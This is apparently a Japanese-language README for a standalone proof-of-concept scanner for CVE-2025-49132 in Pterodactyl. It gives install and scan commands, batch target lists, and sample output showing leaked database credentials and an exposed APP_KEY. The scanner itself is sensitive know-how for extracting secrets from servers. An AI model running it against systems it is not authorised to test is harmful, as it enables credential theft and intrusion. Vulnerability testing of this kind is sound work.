
PoC - CVE-2025-49132
このスキャナーはDockerに依存せずPython上で直接動作するため、Dockerが利用できない環境やDockerを必要としない環境に適しています。
pip install -r requirements-standalone.txt
手動インストール:
pip install requests urllib3
python standalone_scanner.py scan http://localhost/
targets.txt を作成します:
http://localhost/
http://localhost:8080
http://localhost:3000
バッチスキャンを実行します:
python standalone_scanner.py batch --file targets.txt
python standalone_scanner.py batch --file targets.txt --output results.json
python standalone_scanner.py interactive
🔍 Scanning: http://localhost/
⏰ Time: 2025-01-27 15:30:45
------------------------------------------------------------
✅ VULNERABLE - Database credentials found!
📊 Database Info:
Host: localhost
Port: 3306
Database: root
Username: root
Password: secret123
🔗 Connection String: root:secret123@localhost:3306/root
✅ VULNERABLE - App configuration found!
📊 App Config:
App Key: base64:your_secret_key_here
Cipher: AES-256-CBC
Debug: false
Environment: production
App Name: Pterodactyl
App URL: http://localhost
Timezone: UTC
Locale: en
🔔 SECURITY WARNING: APP_KEY exposed!
This key is used for encryption/decryption
Can be used to decrypt sensitive data
🔍 Scanning: http://localhost/
⏰ Time: 2025-01-27 15:30:45
------------------------------------------------------------
❌ NOT VULNERABLE (Status: 404)
pip install requests
SSL警告は自動的に抑制されます。追加の設定は不要です。
デフォルトのタイムアウトは10秒です。必要に応じてソースコード内の timeout パラメータを変更してください。
# Install dependencies
pip install requests urllib3
# Perform test scan
python standalone_scanner.py scan http://localhost/
# Execute batch analysis
python standalone_scanner.py batch --file targets.txt --output results.json
Target Input → HTTP Request → Response Analysis → Vulnerability Detection → Output Generation
このツールは以下の用途向けに設計されています:
注記: 対象システムをスキャンする前に、必ず適切な許可を取得してください。
| 機能 | スタンドアロン | コンテナ |
|---|
| セットアップの複雑さ | 最小限 | Docker依存 |
| 依存関係 | Pythonパッケージ | Docker + Python |
| パフォーマンス | 最適化 | 同等 |
| プロセス分離 | なし | 完全分離 |
| 展開の移植性 | 高 | 中 |